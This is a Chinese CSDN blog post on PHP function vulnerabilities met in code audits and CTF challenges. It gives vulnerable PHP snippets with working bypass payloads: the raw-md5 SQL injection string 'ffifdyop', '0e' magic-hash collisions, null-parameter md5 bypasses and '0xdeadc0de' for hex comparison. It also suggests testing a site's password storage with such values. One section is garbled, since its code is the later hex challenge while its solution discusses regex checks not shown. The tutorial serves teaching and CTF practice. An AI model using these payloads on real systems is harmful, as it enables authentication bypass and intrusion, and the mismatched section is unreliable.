PHP代码审计之函数漏洞(下)

最新推荐文章于 2024-10-04 13:24:46 发布
置顶 最新推荐文章于 2024-10-04 13:24:46 发布
阅读量4.7k 收藏 8
点赞数 2
分类专栏: CTF学习 Web安全 代码审计 Web 安全 CTF大本营
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JBlock/article/details/88534588
版权
CTF学习 同时被 3 个专栏收录
15 篇文章 0 订阅
订阅专栏
Web安全
14 篇文章 1 订阅
订阅专栏
Web 安全
12 篇文章 3 订阅
订阅专栏

前言

此篇文件属于代码审计篇的一个环节,其意图是为总结php常见函数漏洞,分为上下两节,此为下节!此篇与命令注入绕过篇和sql注入回顾篇同属一个系列!欢迎各位斧正!

目录

前言

正文

md5()引发的注入

md5加密相等绕过

数字验证正则绕过

md5函数验证绕过

十六进制与数字比较绕过

后记

正文

md5()引发的注入

<?php
$password=$_POST['password'];
$sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'";
$result=mysqli_query($link,$sql);
if(mysqli_num_rows($result)>0){
echo 'flag is :'.$flag;
}
else{
echo '密码错误!';
} 
?>

MD5之后是hex格式,转化到字符串时如果出现'or'xxxx的形式,就会导致注入。 payload:ffifdyop

md5(ffifdyop,32) = 276f722736c95d99e921722cf9ed621c
转换成字符串后为
'or'6�]��!r,��b�

md5加密相等绕过

代码

<?php
$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
    echo "nctf{*****************}";
} else {
    echo "false!!!";
}}
else{echo "please input a";}
​
?>

题解:

http://127.0.0.1/Php_Bug/13.php?a=240610708

==对比的时候会进行数据转换,0eXXXXXXXXXX 转成0了,如果比较一个数字和字符串或者比较涉及到数字内容的字符串,则字符串会被转换为数值并且比较按照数值来进行

var_dump(md5('240610708') == md5('QNKCDZO'));
var_dump(md5('aabg7XSs') == md5('aabC9RqS'));
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
var_dump('0010e2' == '1e3');
var_dump('0x1234Ab' == '1193131');
var_dump('0xABCdef' == ' 0xABCdef');
​
md5('240610708'); // 0e462097431906509019562988736854 
md5('QNKCDZO'); // 0e830400451993494058024219903391

把你的密码设成 0x1234Ab,然后退出登录再登录,换密码 1193131登录,如果登录成功,那么密码绝对是明文保存的没跑。

同理,密码设置为 240610708,换密码 QNKCDZO登录能成功,那么密码没加盐直接md5保存的。

资料:

数字验证正则绕过

<?php
​
error_reporting(0);
function noother_says_correct($temp)
{
    $flag = 'flag{test}';
    $one = ord('1');  //ord — 返回字符的 ASCII 码值
    $nine = ord('9'); //ord — 返回字符的 ASCII 码值
    $number = '3735929054';
    // Check all the input characters!
    for ($i = 0; $i < strlen($number); $i++)
    { 
        // Disallow all the digits!
        $digit = ord($temp{$i});
        if ( ($digit >= $one) && ($digit <= $nine) )
        {
            // Aha, digit not allowed!
            return "flase";
        }
    }
    if($number == $temp)
        return $flag;
}
$temp = $_GET['password'];
echo noother_says_correct($temp);
​
?>

题解:

0 >= preg_match('/^[[:graph:]]{12,}$/', $password) 意为必须是12个字符以上(非空格非TAB之外的内容)

$reg = '/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/'; 
if (6 > preg_match_all($reg, $password, $arr))

意为匹配到的次数要大于6次

$ps = array('punct', 'digit', 'upper', 'lower'); //[[:punct:]] 任何标点符号 [[:digit:]] 任何数字  [[:upper:]] 任何大写字母  [[:lower:]] 任何小写字母 
foreach ($ps as $pt) 
{ 
    if (preg_match("/[[:$pt:]]+/", $password)) 
        $c += 1; 
} 
if ($c < 3) break;

意为必须要有大小写字母,数字,字符内容三种与三种以上

if ("42" == $password) echo $flag;

意为必须等于42

答案:

42.00e+00000000000 
或
420.000000000e-1

资料:

md5函数验证绕过

<?php
error_reporting(0);
$flag = 'flag{test}';
$temp = $_GET['password'];
if(md5($temp)==0){
    echo $flag;
}
?>

题解:

if(md5($temp)==0)要使md5函数加密值为0

  • 方法一: 使password不赋值,为NULLNULL == 0true http://127.0.0.1/php_bug/23.php?password= http://127.0.0.1/php_bug/23.php
  • 方法二: 经过MD5运算后,为0e******的形式,其结果为0*10n次方,结果还是零 http://127.0.0.1/php_bug/23.php?password=240610708http://127.0.0.1/php_bug/23.php?password=QNKCDZO

十六进制与数字比较绕过

栗子:

<?php
​
error_reporting(0);
function noother_says_correct($temp)
{
    $flag = 'flag{test}';
    $one = ord('1');  //ord — 返回字符的 ASCII 码值
    $nine = ord('9'); //ord — 返回字符的 ASCII 码值
    $number = '3735929054';
    // Check all the input characters!
    for ($i = 0; $i < strlen($number); $i++)
    { 
        // Disallow all the digits!
        $digit = ord($temp{$i});
        if ( ($digit >= $one) && ($digit <= $nine) )
        {
            // Aha, digit not allowed!
            return "flase";
        }
    }
    if($number == $temp)
        return $flag;
}
$temp = $_GET['password'];
echo noother_says_correct($temp);
​
?>

题解:

这里,它不让输入1到9的数字,但是后面却让比较一串数字,平常的方法肯定就不能行了,大家都知道计算机中的进制转换,当然也是可以拿来比较的,0x开头则表示16进制,将这串数字转换成16进制之后发现,是deadc0de,在开头加上0x,代表这个是16进制的数字,然后再和十进制的 3735929054比较,答案当然是相同的,返回true拿到flag

echo  dechex ( 3735929054 ); // 将3735929054转为16进制
结果为:deadc0de

构造:

http://127.0.0.1/Php_Bug/20.php?password=0xdeadc0de

 

后记

此篇为PHP函数漏洞审计下篇,总结了一些常见函数漏洞,并结合了CTF题目进行分析!PHP代码审计系列还会继续,希望大家能有所收获!不积硅步,无以至千里!

PHP代码审计之函数漏洞(上)

JBlock
关注
专栏目录
php代码审计函数漏洞审计 (1)
cpongo5
02-22 331
前言 此篇文件属于代码审计篇的一个环节,其意图是为总结php常见函数漏洞,此篇与命令注入绕过篇和sql注入回顾篇同属一个系列!欢迎各位斧正! 文章目录前言正文intval()使用不当导致安全漏洞的分析switch()in_array()PHP弱类型的特性"."被替换成"_"unsetserialize 和 unserialize漏洞session 反序列化漏洞MD5 compare漏洞ereg函数漏洞:00截断Strcmp()漏洞is_numeric函数sha1 和 md5 函数preg_matchpars
PHP代码审计中常见的漏洞(一)
武天旭的博客
05-31 1082
经过漫长时间的迭代更新,内容从一开始的碎片化网罗搜集,到排版与整合划分,再到学习与实践验证,最后摒弃初始,用自己的语言与实践结论通俗的将它展现出来。强化知识技能的同时也为读者带来更好的阅读体验。 本篇介绍了以下代码安全问题:
尽最大可能分析上传源码及漏洞利用方式
weixin_33735077的博客
07-18 199
0x00 简单源码分析 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 <?php if ((($_FI...
小明学习代码审计writeup
weixin_30609287的博客
07-18 433
小明学习代码审计writeup 题目来自hackinglab.cn 综合关 题目地址:http://lab1.xseclab.com/pentest6_210deacdf09c9fe184d16c8f7288164f/index.php 访问题目地址得到如下源码: Please Reset Your Password Then Get your flag! <a href="./rese...
PHP代码审计方法与套路
最新发布
qq_44870829的博客
10-04 648
下面定义了一个Sqlwaf函数,它过滤一些Sql注入中的敏感字符串,如and,select,from等,再定义了一个get_client_ip函数,顾名思义它的功能是获取用户的ip,clean_input,是一个过滤的函数,is_pic函数,通过判断图片后缀,判断是否是图片,最后not find,输出一些404信息。通过详细阅读公共函数文件和安全函数过滤文件等文件,清晰掌握用户输入的数据,哪些被过滤,哪些无过滤,在哪里被过滤了,如何过滤的,能否绕过过滤的数据。有没有使用addslasher()处理?
[Java代码审计]javacon WriteUp
Y4tacker的博客
07-21 1030
文章目录写在前面javacon 写在前面 在P神星球看到的,这里学习一下,文件在https://www.leavesongs.com/media/attachment/2018/11/23/challenge-0.0.1-SNAPSHOT.jar javacon 运行的时候利用java -jar challenge-0.0.1-SNAPSHOT.jar 首先查看配置 首先在登录页面,在login页面post接收参数,与配置当中的比对,成功则设置cookie @PostMapping({"/login"})
JAVAWEB代码审计技巧方法
weixin_41872749的博客
07-27 1063
JAVA代码审计技巧方法 在JAVA WEB代码审计中,首先要做的就是确定项目的依赖库组织形式,其次就是确定项目所使用的框架。 1.依赖库组织形式确定。组织形式一般有两类,maven与lib文件夹的依赖形式。maven组织形式必然存在pom.xml配置文件,该配置文件中标识了项目中所使用到的各类框架以及工具集,名称与版本。lib组织形式一般在src\main\webapp\WEB-INF\lib下存在大量jar包,其命名方式未库名+版本号形式。 **2.**项目所使用的框架确定。 如果是maven组织形式,
浅谈CTF中代码审计PHP死亡退出
m0re's blog
10-24 1941
前言:遇到一个代码审计的题目,略有思考。记录一下~ 源码就是这样的 <?php $content = '<?php exit; ?>'; $content .= $_POST['data']; file_put_contents($_POST['filename'], $content);
代码审计之youdiancms最新版getshell漏洞1
08-03
代码审计之youdiancms最新版getshell漏洞 本文将对youdiancms最新版getshell漏洞进行代码审计,详细讲解漏洞的发现和利用过程。 SQL注入漏洞 第一步,我们拿到源码,发现该系统是基于THINKPHP3开发的。在App/Lib/...
通过代码审计找出网站中的XSS漏洞实战
01-27
【XSS漏洞实战:通过代码审计找出网站中的漏洞】 XSS(Cross-site scripting)是一种常见的网络安全漏洞,允许攻击者在用户浏览器中注入恶意脚本,从而窃取敏感信息或执行其他恶意行为。针对XSS漏洞的检测,一种...
代码审计基础-漏洞银行大咖面对面2-SHIELD
07-31
在不同的历史时期,PHP代码审计的方法和技术也在不断演进: - **2007-2009年**:正则表达式是主要的审计工具,用于识别特定模式的代码片段。 - **2009-2012年**:利用词法分析器处理面向过程的代码,这有助于理解...
代码审计实战积累2
赵花花08042的博客
06-09 662
前言:一些代码审计过程中学习到的点
CTF .git php代码审计 [Buy a lottery!]
baynk的博客
03-21 1052
Buy a lottery! 一个猜七色球游戏,玩一次20,对2个球赢5,3个球赢20,4个球赢300,7个球直接有了买flag的钱,这概率基本不可能,只要能中,明天就去买彩票。。。 先以为可能存在逻辑漏洞,审了半天也没发现有点啥。后来从头开始完成,在进行信息收集过程中扫到了以下信息。 接着去访问,得到一个关键信息.git。 .git不能直接访问,这是一个目录,但是可以通过工具把.git打包...
php源码 辅助发卡_记一次简单的php代码审计
weixin_39912163的博客
12-28 253
PHP代码审计所需工具:(1) 环境:PHPstudy我这里直接使用phpstudy。其他的如:xampp,lamp等集成环境都可以。Phpsyudy官网地址:https://www.xp.cn (2) 代码审计工具:“工欲善其事,必先利其器。”一款好的代码审计工具可以辅助我们的白盒测试,提高挖掘漏洞的效率。下面我来介绍一下两款常用的代码审计工具。1. RIPSRips是PHP语言开发的...
PHP代码审计工具RIPS
zero
10-10 1197
在Centos7操作系统中安装rips并使用rips进行代码审计工作 # 安装依赖 yum install httpd.x86_64 php-devel.x86_64 php.x86_64 php-mysql.x86_64 php-soap.x86_64 php-xml.x86_64 php-xmlrpc.x86_64 php-ldap.x86_64 php-cli.x86_64 -y # 下载rips并解压至Web目录 unzip rips-0.55.zip -d /var/www/html/ mv r
Bugku CTF 代码审计 writeup(未完待续)
KRDecad3的博客
05-21 1947
Bugku CTF 代码审计 writeup(未完待续) 0x01extract变量覆盖 extract()函数功能:从数组中将变量导入到当前的符号表。使用数组键名作为变量名,使用数组键值作为变量值。 extract(array,extract_rules,prefix) 题中给出extract($_GET),相当于: $shiyan = $_GET[‘shiyan’] $flag...
PHP 开发与代码审计(总结)
CSDN
01-27 7425
笔者将学习PHP时的学习笔记分享出来,基本上是前面的那些博文的汇总,看起来更方便一些,笔者最近放弃了PHP代码审计部分,所以不再继续学下去了,由于精力实在达不到,只能选择一样进行发展,不想成为半瓶子醋,以后将集中精力做好运维的前提下继续研究二进制方向。
PHP 代码审计常规漏洞的步骤和技巧
weixin_62369433的博客
04-12 591
在这个数字化时代,安全已经成为最重要的关键词之一。对于开发人员和安全专业人员来说,代码审计是确保应用程序和服务安全性的一项重要任务。通过审计,可以发现并修复各种类型的漏洞,包括 SQL 注入、XSS、CSRF、文件上传漏洞等。愿你们在代码审计的道路上勇往直前,不断学习和探索,找到应用程序中的所有漏洞,并将其修复,为我们的数字世界带来更加安全可靠的服务。
PHP代码审计中你不知道的牛叉技术点
dfdhxb995397的博客
12-21 181
一、前言 php代码审计如字面意思,对php源代码进行审查,理解代码的逻辑,发现其中的安全漏洞。如审计代码中是否存在sql注入,则检查代码中sql语句到数据库的传输 和调用过程。 入门php代码审计实际并无什么门槛要求,只需要理解基础的php语法规则,以及理解各种类型漏洞的出现原因则可以开始尝试审计php源代码。通常的漏洞演示中sql语句会直接传入php自带的函数传入...
WEB代码审计:变量与危险函数揭示漏洞全貌
PHP作为一种广泛应用且复杂的编程语言,因其灵活的变量处理机制(如全局变量)、庞大的函数库以及早期版本的register_globals默认设置,使得PHP代码审计更具挑战性。《高级PHP应用程序漏洞审核技术》等相关资料提供...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值